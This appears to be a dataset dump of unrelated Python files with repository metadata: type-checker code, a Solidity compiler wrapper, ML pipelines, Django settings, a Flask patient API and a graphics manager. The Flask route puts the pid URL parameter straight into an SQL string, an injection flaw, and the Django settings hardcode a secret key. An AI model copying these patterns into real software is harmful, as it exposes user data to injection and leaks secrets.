var.is_inferred = True
return AnyType(TypeOfAny.special_form)
def visit_typeddict_expr(self, e: TypedDictExpr) -> Type:
return AnyType(TypeOfAny.special_form)
def visit__promote_expr(self, e: PromoteExpr) -> Type:
return e.type
def visit_star_expr(self, e: StarExpr) -> StarType:
return StarType(self.accept(e.expr))
def object_type(self) -> Instance:
"""Return instance type 'object'."""
return self.named_type('builtins.object')
def bool_type(self) -> Instance:
"""Return instance type 'bool'."""
return self.named_type('builtins.bool')
def narrow_type_from_binder(self, expr: Expression, known_type: Type) -> Type:
if literal(expr) >= LITERAL_TYPE:
restriction = self.chk.binder.get(expr)
# If the current node is deferred, some variables may get Any types that they
# otherwise wouldn't have. We don't want to narrow down these since it may
# produce invalid inferred Optional[Any] types, at least.
if restriction and not (isinstance(known_type, AnyType)
and self.chk.current_node_deferred):
ans = narrow_declared_type(known_type, restriction)
return ans
return known_type
def has_any_type(t: Type) -> bool:
"""Whether t contains an Any type"""
return t.accept(HasAnyType())
class HasAnyType(types.TypeQuery[bool]):
def __init__(self) -> None:
super().__init__(any)
def visit_any(self, t: AnyType) -> bool:
return t.type_of_any != TypeOfAny.special_form # special forms are not real Any types
def has_coroutine_decorator(t: Type) -> bool:
"""Whether t came from a function decorated with `@coroutine`."""
return isinstance(t, Instance) and t.type.fullname() == 'typing.AwaitableGenerator'
def is_async_def(t: Type) -> bool:
"""Whether t came from a function defined using `async def`."""
# In check_func_def(), when we see a function decorated with
# `@typing.coroutine` or `@async.coroutine`, we change the
# return type to typing.AwaitableGenerator[...], so that its
# type is compatible with either Generator or Awaitable.
# But for the check here we need to know whether the original
# function (before decoration) was an `async def`. The
# AwaitableGenerator type conveniently preserves the original
# type as its 4th parameter (3rd when using 0-origin indexing
# :-), so that we can recover that information here.
# (We really need to see whether the original, undecorated
# function was an `async def`, which is orthogonal to its
# decorations.)
if (isinstance(t, Instance)
and t.type.fullname() == 'typing.AwaitableGenerator'
and len(t.args) >= 4):
t = t.args[3]
return isinstance(t, Instance) and t.type.fullname() == 'typing.Coroutine'
def is_empty_tuple(t: Type) -> bool:
return isinstance(t, TupleType) and not t.items
def is_duplicate_mapping(mapping: List[int], actual_kinds: List[int]) -> bool:
# Multiple actuals can map to the same formal only if they both come from
# varargs (*args and **kwargs); in this case at runtime it is possible that
# there are no duplicates. We need to allow this, as the convention
# f(..., *args, **kwargs) is common enough.
return len(mapping) > 1 and not (
len(mapping) == 2 and
actual_kinds[mapping[0]] == nodes.ARG_STAR and
actual_kinds[mapping[1]] == nodes.ARG_STAR2)
def replace_callable_return_type(c: CallableType, new_ret_type: Type) -> CallableType:
"""Return a copy of a callable type with a different return type."""
return c.copy_modified(ret_type=new_ret_type)
class ArgInferSecondPassQuery(types.TypeQuery[bool]):
"""Query whether an argument type should be inferred in the second pass.
The result is True if the type has a type variable in a callable return
type anywhere. For example, the result for Callable[[], T] is True if t is
a type variable.
"""
def __init__(self) -> None:
super().__init__(any)
def visit_callable_type(self, t: CallableType) -> bool:
return self.query_types(t.arg_types) or t.accept(HasTypeVarQuery())
class HasTypeVarQuery(types.TypeQuery[bool]):
"""Visitor for querying whether a type has a type variable component."""
def __init__(self) -> None:
super().__init__(any)
def visit_type_var(self, t: TypeVarType) -> bool:
return True
def has_erased_component(t: Optional[Type]) -> bool:
return t is not None and t.accept(HasErasedComponentsQuery())
class HasErasedComponentsQuery(types.TypeQuery[bool]):
"""Visitor for querying whether a type has an erased component."""
def __init__(self) -> None:
super().__init__(any)
def visit_erased_type(self, t: ErasedType) -> bool:
return True
def has_uninhabited_component(t: Optional[Type]) -> bool:
return t is not None and t.accept(HasUninhabitedComponentsQuery())
class HasUninhabitedComponentsQuery(types.TypeQuery[bool]):
"""Visitor for querying whether a type has an UninhabitedType component."""
def __init__(self) -> None:
super().__init__(any)
def visit_uninhabited_type(self, t: UninhabitedType) -> bool:
return True
def arg_approximate_similarity(actual: Type, formal: Type) -> bool:
"""Return if caller argument (actual) is roughly compatible with signature arg (formal).
This function is deliberately loose and will report two types are similar
as long as their "shapes" are plausibly the same.
This is useful when we're doing error reporting: for example, if we're trying
to select an overload alternative and there's no exact match, we can use
this function to help us identify which alternative the user might have
*meant* to match.
"""
# Erase typevars: we'll consider them all to have the same "shape".
if isinstance(actual, TypeVarType):
actual = actual.erase_to_union_or_bound()
if isinstance(formal, TypeVarType):
formal = formal.erase_to_union_or_bound()
# Callable or Type[...]-ish types
def is_typetype_like(typ: Type) -> bool:
return (isinstance(typ, TypeType)
or (isinstance(typ, FunctionLike) and typ.is_type_obj())
or (isinstance(typ, Instance) and typ.type.fullname() == "builtins.type"))
if isinstance(formal, CallableType):
if isinstance(actual, (CallableType, Overloaded, TypeType)):
return True
if is_typetype_like(actual) and is_typetype_like(formal):
return True
# Unions
if isinstance(actual, UnionType):
return any(arg_approximate_similarity(item, formal) for item in actual.relevant_items())
if isinstance(formal, UnionType):
return any(arg_approximate_similarity(actual, item) for item in formal.relevant_items())
# TypedDicts
if isinstance(actual, TypedDictType):
if isinstance(formal, TypedDictType):
return True
return arg_approximate_similarity(actual.fallback, formal)
# Instances
# For instances, we mostly defer to the existing is_subtype check.
if isinstance(formal, Instance):
if isinstance(actual, CallableType):
actual = actual.fallback
if isinstance(actual, Overloaded):
actual = actual.items()[0].fallback
if isinstance(actual, TupleType):
actual = actual.fallback
if isinstance(actual, Instance) and formal.type in actual.type.mro:
# Try performing a quick check as an optimization
return True
# Fall back to a standard subtype check for the remaining kinds of type.
return is_subtype(erasetype.erase_type(actual), erasetype.erase_type(formal))
def any_causes_overload_ambiguity(items: List[CallableType],
return_types: List[Type],
arg_types: List[Type],
arg_kinds: List[int],
arg_names: Optional[Sequence[Optional[str]]]) -> bool:
"""May an argument containing 'Any' cause ambiguous result type on call to overloaded function?
Note that this sometimes returns True even if there is no ambiguity, since a correct
implementation would be complex (and the call would be imprecisely typed due to Any
types anyway).
Args:
items: Overload items matching the actual arguments
arg_types: Actual argument types
arg_kinds: Actual argument kinds
arg_names: Actual argument names
"""
if all_same_types(return_types):
return False
actual_to_formal = [
map_formals_to_actuals(
arg_kinds, arg_names, item.arg_kinds, item.arg_names, lambda i: arg_types[i])
for item in items
]
for arg_idx, arg_type in enumerate(arg_types):
if has_any_type(arg_type):
matching_formals_unfiltered = [(item_idx, lookup[arg_idx])
for item_idx, lookup in enumerate(actual_to_formal)
if lookup[arg_idx]]
matching_returns = []
matching_formals = []
for item_idx, formals in matching_formals_unfiltered:
matched_callable = items[item_idx]
matching_returns.append(matched_callable.ret_type)
# Note: if an actual maps to multiple formals of differing types within
# a single callable, then we know at least one of those formals must be
# a different type then the formal(s) in some other callable.
# So it's safe to just append everything to the same list.
for formal in formals:
matching_formals.append(matched_callable.arg_types[formal])
if not all_same_types(matching_formals) and not all_same_types(matching_returns):
# Any maps to multiple different types, and the return types of these items differ.
return True
return False
def all_same_types(types: Iterable[Type]) -> bool:
types = list(types)
if len(types) == 0:
return True
return all(is_same_type(t, types[0]) for t in types[1:])
def merge_typevars_in_callables_by_name(
callables: Sequence[CallableType]) -> Tuple[List[CallableType], List[TypeVarDef]]:
"""Takes all the typevars present in the callables and 'combines' the ones with the same name.
For example, suppose we have two callables with signatures "f(x: T, y: S) -> T" and
"f(x: List[Tuple[T, S]]) -> Tuple[T, S]". Both callables use typevars named "T" and
"S", but we treat them as distinct, unrelated typevars. (E.g. they could both have
distinct ids.)
If we pass in both callables into this function, it returns a a list containing two
new callables that are identical in signature, but use the same underlying TypeVarDef
and TypeVarType objects for T and S.
This is useful if we want to take the output lists and "merge" them into one callable
in some way -- for example, when unioning together overloads.
Returns both the new list of callables and a list of all distinct TypeVarDef objects used.
"""
output = [] # type: List[CallableType]
unique_typevars = {} # type: Dict[str, TypeVarType]
variables = [] # type: List[TypeVarDef]
for target in callables:
if target.is_generic():
target = freshen_function_type_vars(target)
rename = {} # Dict[TypeVarId, TypeVar]
for tvdef in target.variables:
name = tvdef.fullname
if name not in unique_typevars:
unique_typevars[name] = TypeVarType(tvdef)
variables.append(tvdef)
rename[tvdef.id] = unique_typevars[name]
target = cast(CallableType, expand_type(target, rename))
output.append(target)
return output, variables
| [
"hewang@mail.bnu.edu.cn"
] | hewang@mail.bnu.edu.cn |
92c6ec1b0ac953e0a1245895ca861e3111037464 | cfa1ef35dccc82950f4dde53a0e576fa56be05c5 | /scripts/pysolc.py | 070c3db1f95a65cf4da0d4fc9e636c4b88d99a9e | [
"Apache-2.0"
] | permissive | YakShavingCatHerder/securify | 08bb0b12b30a8b46f5a6bc388d343169c955330e | 51ba1240e60332b4a1e6ad02090da6fe57676354 | refs/heads/master | 2022-04-03T06:05:00.418130 | 2020-01-23T17:02:22 | 2020-01-23T17:02:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,052 | py | """
Author: Tobias Kaiser
Copyright 2018 ChainSecurity AG
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import re
import operator
from collections import namedtuple
from distutils.version import StrictVersion
import sys
import json
import subprocess
import logging
import time
import requests
import requests.exceptions
from solcx.main import _parse_compiler_output
from solcx.wrapper import solc_wrapper
from solcx.exceptions import SolcError
from solcx import get_available_solc_versions
from solcx import get_solc_folder
from solcx import install_solc
from .utils import find_node_modules_dir
MINIMAL_SOLC_VERSION = "0.4.11"
class NoSolidityProject(BaseException):
def __init__(self, dirpath):
self.dir = dirpath
class CompilerVersionNotSupported(BaseException):
pass
class SolidityCompilationException(SolcError):
def __init__(self, solc_exception, solc_version, files):
super().__init__(
solc_exception.command,
solc_exception.return_code,
solc_exception.stdin_data,
solc_exception.stderr_data,
solc_exception.stdout_data,
solc_exception.message
)
self.solc_version = solc_version
self.files = files
class OffsetException(Exception):
pass
RELEASES_LIST = "https://api.github.com/repos/ethereum/solidity/releases"
OUTPUT_VALUES = ('abi',
'ast',
'bin-runtime',
'srcmap-runtime')
class SolidityVersion(StrictVersion):
"""Class to define a solidity version
inherits comparators from StrictVersion and adds one for the case '^x.y.z'
"""
def __xor__(self, other):
return self.version[0] == other.version[0] and \
self.version[1:] >= other.version[1:]
def __str__(self):
s = super(SolidityVersion, self).__str__()
# Fix for "0.5"
if len(s) <= 3:
s += ".0"
return s
_SOLC_VERSIONS = []
_SOLC_VERSIONS_LAST_UPDATE = 0
OperatorVersionTuple = namedtuple('OperatorVersionTuple', ['op', 'v'])
# grouping matches into operator and version part
# e.g for >=0.4.24 it would group >= and 0.4.24
comp_version_rex = re.compile(r'(?P<operator>(<|>|>=|<=|\^)?)'
r'(?P<version>\d+\.\d+\.\d+)')
ops = {
'>': operator.gt,
'<': operator.lt,
'': operator.eq,
'>=': operator.ge,
'<=': operator.le,
'^': operator.xor
}
def _get_binary(solc_version):
"""Returns the binary for some version of solc.
"""
binary = os.path.join(get_solc_folder(), f'solc-v{solc_version}')
if not os.path.exists(binary):
raise AssertionError(f'solc binary not found for version: {solc_version}')
return binary
def get_supported_solc_versions():
global _SOLC_VERSIONS
global _SOLC_VERSIONS_LAST_UPDATE
# Cache the result for one hour
if len(_SOLC_VERSIONS) != 0 and _SOLC_VERSIONS_LAST_UPDATE >= time.time() - 3600:
return _SOLC_VERSIONS
try:
new_versions = get_available_solc_versions()
_SOLC_VERSIONS = sorted((SolidityVersion(v[1:]) for v in new_versions))
_SOLC_VERSIONS_LAST_UPDATE = time.time()
except requests.exceptions.RequestException:
# If offline, work with installed versions
logging.info('Fetching the latest compiler releases failed, relying on known versions.')
return _SOLC_VERSIONS
def get_default_solc_version():
return get_supported_solc_versions()[-1]
def parse_version(source):
conditions = _parse_conditions(source)
return _find_version_for_conditions(conditions)
def _find_version_for_conditions(conditions):
if len(conditions) == 0:
return get_default_solc_version()
def fullfills_all_conditions(v):
return all(map(lambda cond: cond.op(v, cond.v), conditions))
try:
return min(filter(fullfills_all_conditions, get_supported_solc_versions()))
except ValueError:
raise CompilerVersionNotSupported("Conflicting Compiler Requirements.")
def _parse_conditions(source):
with open(source, encoding='utf-8') as f:
lines = f.readlines()
for l in lines:
if 'pragma' in l and not 'experimental' in l:
conditions = list(map(
lambda v: OperatorVersionTuple(
ops[v[1]], SolidityVersion(v[2])),
comp_version_rex.findall(l))
)
return conditions
return []
def compile_solfiles(files, proj_dir, solc_version=None, output_values=OUTPUT_VALUES, remappings=None):
def complete_remapping(remapping):
name, old_path = remapping.split('=')
new_path = os.path.join(proj_dir, old_path)
return f'{name}={new_path}'
if remappings is None:
remappings = []
remappings = [complete_remapping(remapping) for remapping in remappings]
node_modules_dir = find_node_modules_dir(proj_dir)
whitelisted_node_modules = ['zeppelin-solidity', 'openzeppelin-solidity', '@daostack', 'rlc-token']
if node_modules_dir is not None:
for whitelisted_node_module in whitelisted_node_modules:
whitelisted_path = os.path.abspath(os.path.join(node_modules_dir, whitelisted_node_module))
if os.path.isdir(whitelisted_path):
remappings.append(f'{whitelisted_node_module}={whitelisted_path}')
if solc_version is None:
if len(get_supported_solc_versions()) == 0:
raise CompilerVersionNotSupported("No compiler available. No connection to GitHub?")
all_conditions = []
for source in files:
all_conditions.extend(_parse_conditions(source))
solc_version = _find_version_for_conditions(all_conditions)
try:
install_solc(f'v{solc_version}')
except (requests.exceptions.ConnectionError, subprocess.CalledProcessError):
raise CompilerVersionNotSupported(f'Failed to install v{solc_version} compiler.')
binary = _get_binary(solc_version)
combined_json = ','.join(output_values)
compiler_kwargs = {
'import_remappings': remappings,
'allow_paths': proj_dir,
'source_files': files,
'solc_binary': binary,
'combined_json': combined_json
}
try:
stdoutdata, _, _, _ = solc_wrapper(**compiler_kwargs)
return _parse_compiler_output(stdoutdata)
except SolcError as e:
raise SolidityCompilationException(e, solc_version, files)
def compile_project(path, remappings=None):
sources = get_sol_files(path)
if not sources:
raise NoSolidityProject(path)
return compile_solfiles(sources, path)
def get_sol_files(project_root):
"""Returns the solidity files contained in the project.
"""
sources = []
test_sources = []
for p, _, files in os.walk(project_root):
for f in files:
if f.endswith('.sol'):
if 'node_modules' not in p and '/test/' not in p[len(str(project_root)):] and not p.endswith('/test'):
sources.append(os.path.join(p, f))
else:
test_sources.append(os.path.join(p, f))
if len(sources) > 0:
return sources
# Only return test sources if no other sources were found
return test_sources
if __name__ == '__main__':
if len(sys.argv) != 3:
sys.exit('Usage: %s PROJECT OUTPUT' % sys.argv[0])
res = compile_project(sys.argv[1])
if sys.argv[2] == '-':
print(res)
else:
with open(sys.argv[2], 'w') as fs:
json.dump(res, fs)
| [
"noreply@github.com"
] | noreply@github.com |
440ce5170b6b74c30529ffd3efbb1496ea483d6e | 527344b91c7d06214888aa69605a05a3762caf47 | /pipeline.py | a58865fb11a81ce6ffdcd44f8624f9adc804114d | [] | no_license | ljing2007/gbm-pipeline | bdecf57643eefb74bb6ec36ef58b388ef54450f5 | 9a8b390012b07300f8635a10ea806b070f1c3d40 | refs/heads/master | 2022-04-30T12:30:14.039639 | 2020-04-05T12:17:04 | 2020-04-05T12:17:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,400 | py | import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from catboost import CatBoostClassifier, Pool, cv
from catboost.datasets import titanic
def build_titanic_dataset():
df_train, df_test = titanic()
df_train.fillna(-999, inplace=True)
df_test.fillna(-999, inplace=True)
X = df_train.drop('Survived', axis=1) # X: train feature
y = df_train.Survived # y: train label
# if the feature value type != float, then be treat as a categorial feature
cate_feat_idx = np.where(X.dtypes != np.float)[0]
x_train, x_vali, y_train, y_vali = train_test_split(X, y, train_size=0.75, random_state=42)
x_test = df_test
return X, y, x_train, x_vali, y_train, y_vali, x_test, cate_feat_idx
def catboost_cv_eval(X, y, cate_feat_idx, params):
print('start catboost model cv eval...')
cv_data = cv(Pool(X, y, cat_features=cate_feat_idx), params, nfold=5)
print('Best vali acc: {:.2f}±{:.2f} on step {}'.format(np.max(cv_data['test-Accuracy-mean']), cv_data['test-Accuracy-std'][np.argmax(cv_data['test-Accuracy-mean'])], np.argmax(cv_data['test-Accuracy-mean'])))
print('Precise vali acc: {}'.format(np.max(cv_data['test-Accuracy-mean'])))
def catboost_train_evel(x_train, y_train, x_vali, y_vali, x_test, params, cate_feat_idx):
print('=============================================')
print('catboost model training...')
train_pool = Pool(x_train, y_train, cat_features=cate_feat_idx)
vali_pool = Pool(x_vali, y_vali, cat_features=cate_feat_idx)
model = CatBoostClassifier(**params, task_type='CPU') # sometimes GPU slower then CPU
model.fit(train_pool, eval_set=vali_pool)
print('=============================================')
print('catboost vali acc: {:06.4f}'.format(accuracy_score(y_vali, model.predict(x_vali))))
print('=============================================')
print('catboost model training parameters:')
for k, v in params.items():
print('{:15}: {}'.format(k, v))
print('=============================================')
print('catboost model predicting...')
test_pred_result = model.predict(x_test)
test_pred_prob = model.predict_proba(x_test)
print(test_pred_result[:10])
print(test_pred_prob[:10])
print('=============================================')
print('catboost feature importances evaluate...')
feat_importances = model.get_feature_importance(train_pool)
feat_names = x_train.columns
feat_importances_df = pd.DataFrame()
feat_importances_df['feat'] = feat_names
feat_importances_df['score'] = feat_importances
feat_importances_df.sort_values(['score'], ascending=False, inplace=True)
feat_importances_df = feat_importances_df.reset_index(drop=True)
print(feat_importances_df)
def test_catboost():
X, y, x_train, x_vali, y_train, y_vali, x_test, cate_feat_idx = build_titanic_dataset()
params = {
'iterations': 2000,
'learning_rate': 0.01,
'eval_metric': 'Accuracy',
'logging_level': 'Verbose',
'loss_function': 'Logloss',
'use_best_model': True
}
# catboost_cv_eval(X, y, cate_feat_idx, params)
catboost_train_evel(x_train, y_train, x_vali, y_vali, x_test, params, cate_feat_idx)
if __name__ == '__main__':
test_catboost()
| [
"goldandrabbit@foxmail.com"
] | goldandrabbit@foxmail.com |
6e38310be82e01e137cece99982ef936860d1f0b | 9ee644fdb3b0a5ae7887ecb1f4a9013b3abbcb8b | /Python/Django/dojo_ninjas/dojo_ninjas/settings.py | f3e07d741cff65ec58b50ed4eae76aa6c0bf3c86 | [] | no_license | avvarga/Lab206 | 0aa0bf7f1e0340466c5e120e7c1a8726f9385567 | c55fae4044625355ec392f3de58442b2767f7916 | refs/heads/master | 2021-04-15T15:42:11.700351 | 2018-04-13T23:07:25 | 2018-04-13T23:07:25 | 126,499,170 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,182 | py | """
Django settings for dojo_ninjas project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'pq8*qkaf^%dwtrv&q#cz=cp)8nd7(4)l_&i$qgg!$@+5bth=a!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.likes_books',
'apps.books_authors',
'apps.dojoninjas',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dojo_ninjas.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dojo_ninjas.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"avvarga@amazon.com"
] | avvarga@amazon.com |
5ffd36d869008d618bce87a0a1a4aa4f68b48187 | d7c906197941a8c0f74674843da8b00fd3fdb06b | /api/application.py | 4531500e225944ee507ecccc252e1ed518ddfbd8 | [] | no_license | assarar/middleware | c5aebc49bf2f0060c89ab23edb7af2bd4571f9a8 | 281e18524fa2b0db57a2d7473e07dd37b8e85c9b | refs/heads/master | 2023-02-16T04:28:01.508871 | 2019-02-08T07:09:44 | 2019-02-08T07:09:44 | 156,621,137 | 0 | 0 | null | 2023-02-02T04:29:48 | 2018-11-07T23:17:33 | Python | UTF-8 | Python | false | false | 910 | py | from flask import Flask
from db import MysqlDatabase
app = Flask(__name__)
connector = MysqlDatabase(host='localhost', user='root',
password='', database='sih')
@app.route('/')
def main():
return "Microservice (patient) en marche !"
@app.route('/patients', methods=['GET'])
def getPatients():
result = connector.execute(query="SELECT * FROM patient")
return result
@app.route('/patients/<pid>', methods=['GET'])
def getPatient(pid):
select = "SELECT * FROM patient where pid like '%s'" % pid
result = connector.execute(query=select)
return result
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-p', '--port', default=2001,
type=int, help='port to listen on')
args = parser.parse_args()
port = args.port
app.run(host='0.0.0.0', port=port)
| [
"ouafae.assrar@gmail.com"
] | ouafae.assrar@gmail.com |
9ef454972e6ab905dfec2327debb7474b0fc91fc | eeebae33ee2da583b464bb675cb6c81119524635 | /fsdet/modeling/postprocessing.py | 8acf145378d611b6b3d701c952733f6f7e27efed | [
"Apache-2.0"
] | permissive | rakshitsakhuja/fsodet-run | 1fe37c752ddc41b3b08cc6e706876edd0606372f | f663f701fb44915eb6de6e3bf8a9b5860db1f4c0 | refs/heads/master | 2023-04-10T23:08:58.718076 | 2021-04-25T09:33:58 | 2021-04-25T09:33:58 | 341,829,584 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,454 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from torch.nn import functional as F
from fsdet.structures import Instances
def detector_postprocess(results, output_height, output_width):
"""
Resize the output instances.
The input images are often resized when entering an object detector.
As a result, we often need the outputs of the detector in a different
resolution from its inputs.
This function will resize the raw outputs of an R-CNN detector
to produce outputs according to the desired output resolution.
Args:
results (Instances): the raw outputs from the detector.
`results.image_size` contains the input image resolution the detector sees.
This object might be modified in-place.
output_height, output_width: the desired output resolution.
Returns:
Instances: the resized output from the model, based on the output resolution
"""
scale_x, scale_y = (output_width / results.image_size[1], output_height / results.image_size[0])
results = Instances((output_height, output_width), **results.get_fields())
if results.has("pred_boxes"):
output_boxes = results.pred_boxes
elif results.has("proposal_boxes"):
output_boxes = results.proposal_boxes
output_boxes.scale(scale_x, scale_y)
output_boxes.clip(results.image_size)
results = results[output_boxes.nonempty()]
return results
| [
"masterkidster@gmail.com"
] | masterkidster@gmail.com |
778001ad149d4c82f36a8f1efe334bf413d659b5 | a739b289cbda3acc9ef69a379cb0d7068c18cf66 | /Transformer_with_vision/model/transformer.py | 9b58365a4b29c5209bc5e7bc12ed2050994278ea | [] | no_license | fhzh123/transformer_research | ac96d837cf287ab9b42dc044344cb70d9bb63724 | a39ca029e3557b8c6eb90eb8ca5eb5964c49b965 | refs/heads/main | 2023-04-18T16:01:57.878040 | 2021-05-09T14:42:05 | 2021-05-09T14:42:05 | 352,910,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,405 | py | import torch
from torch import nn
from torch import Tensor
from torch.nn import functional as F
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
class MultiHeadAttention(nn.Module):
def __init__(self, emb_size: int = 512, num_heads: int = 8, dropout: float = 0):
super().__init__()
self.emb_size = emb_size
self.num_heads = num_heads
self.keys = nn.Linear(emb_size, emb_size)
self.queries = nn.Linear(emb_size, emb_size)
self.values = nn.Linear(emb_size, emb_size)
self.att_drop = nn.Dropout(dropout)
self.projection = nn.Linear(emb_size, emb_size)
def forward(self, x : Tensor, mask: Tensor = None) -> Tensor:
# split keys, queries and values in num_heads
queries = rearrange(self.queries(x), "b n (h d) -> b h n d", h=self.num_heads)
keys = rearrange(self.keys(x), "b n (h d) -> b h n d", h=self.num_heads)
values = rearrange(self.values(x), "b n (h d) -> b h n d", h=self.num_heads)
# sum up over the last axis
energy = torch.einsum('bhqd, bhkd -> bhqk', queries, keys) # batch, num_heads, query_len, key_len
if mask is not None:
fill_value = torch.finfo(torch.float32).min
energy.mask_fill(~mask, fill_value)
scaling = self.emb_size ** (1/2)
att = F.softmax(energy, dim=-1) / scaling
att = self.att_drop(att)
# sum up over the third axis
out = torch.einsum('bhal, bhlv -> bhav ', att, values)
out = rearrange(out, "b h n d -> b n (h d)")
out = self.projection(out)
return out
class ResidualAdd(nn.Module):
def __init__(self, fn):
super().__init__()
self.fn = fn
def forward(self, x, **kwargs):
res = x
x = self.fn(x, **kwargs)
x += res
return x
class FeedForwardBlock(nn.Sequential):
def __init__(self, emb_size: int, expansion: int = 4, drop_p: float = 0.):
super().__init__(
nn.Linear(emb_size, expansion * emb_size),
nn.GELU(),
nn.Dropout(drop_p),
nn.Linear(expansion * emb_size, emb_size),
)
class TransformerEncoderBlock(nn.Sequential):
def __init__(self,
emb_size: int = 768,
drop_p: float = 0.,
forward_expansion: int = 4,
forward_drop_p: float = 0.,
** kwargs):
super().__init__(
ResidualAdd(nn.Sequential(
nn.LayerNorm(emb_size),
MultiHeadAttention(emb_size, **kwargs),
nn.Dropout(drop_p)
)),
ResidualAdd(nn.Sequential(
nn.LayerNorm(emb_size),
FeedForwardBlock(
emb_size, expansion=forward_expansion, drop_p=forward_drop_p),
nn.Dropout(drop_p)
)
))
class TransformerEncoder(nn.Sequential):
def __init__(self, depth: int = 12, **kwargs):
super().__init__(*[TransformerEncoderBlock(**kwargs) for _ in range(depth)])
class ClassificationHead(nn.Sequential):
def __init__(self, emb_size: int = 768, n_classes: int = 1000):
super().__init__(
Reduce('b n e -> b e', reduction='mean'),
nn.LayerNorm(emb_size),
nn.Linear(emb_size, n_classes)) | [
"fhzh@naver.com"
] | fhzh@naver.com |
b720b9c5a348255e3b970540d2f67bbf1a434b9c | 0061ce5fa45763d99ca230c5a8989ab775ff62b0 | /src/machine_learning_main.py | 0ceaada39f19980993eadc0ae49dec9cbd8db8b0 | [] | no_license | marianolongo/va-tp-deteccion | f1f9590d2a35586cbea18dc5b0d7587c15969b8c | 840547e6ee223db9c49afa0e7ac026795d734e13 | refs/heads/master | 2022-12-21T13:33:25.407990 | 2020-09-25T04:38:28 | 2020-09-25T04:38:28 | 298,467,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | from src.machine.utils.hu_moments_generation import generate_hu_moments_file
from src.machine.utils.testing_model import load_and_test
from src.machine.utils.training_model import train_model
generate_hu_moments_file()
model = train_model()
load_and_test(model)
| [
"mariano.longo@ing.austral.edu.ar"
] | mariano.longo@ing.austral.edu.ar |
27fe093654f6b8ee9c997e2087efe318a09c1895 | affaef08f7746dbe673dd6c2ebabb31b7c41d299 | /python/cs381_GameDevPipeline/StumpysGrove/gfxMgr.py | d632a6da182cb2552b413f29281cdee98270c9d3 | [] | no_license | jflorespadilla/SchoolProjects | 066abe331ca75be8fff75abf7ca5a0a7811d369f | da1f7e1e7ad90902000c4d6920e8cb61a8d2bb19 | refs/heads/master | 2020-09-20T03:01:57.900266 | 2016-09-08T18:16:53 | 2016-09-08T18:16:53 | 67,721,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,882 | py | # Graphics manager
import ogre.renderer.OGRE as ogre
import math
import utils
# Manages graphics. Creates graphics, scene, scene nodes, renders scene
class GfxMgr:
def __init__(self, engine):
self.engine = engine
pass
def init(self):
self.createRoot()
self.defineResources()
self.setupRenderSystem()
self.createRenderWindow()
self.initializeResourceGroups()
self.setupScene()
def tick(self, dtime):
# self.camYawNode.position = (self.engine.gameMgr.stumpy.pos.x, self.engine.gameMgr.stumpy.pos.y, self.engine.gameMgr.stumpy.pos.z)
# timeScaledRotation = self.engine.gameMgr.stumpy.turningRate * dtime
# angleDiff = utils.diffAngle(self.engine.gameMgr.stumpy.desiredHeading, self.engine.gameMgr.stumpy.heading)
# dheading = utils.clamp(angleDiff, -timeScaledRotation, timeScaledRotation)
# self.camYawNode.yaw(dheading)
self.root.renderOneFrame()
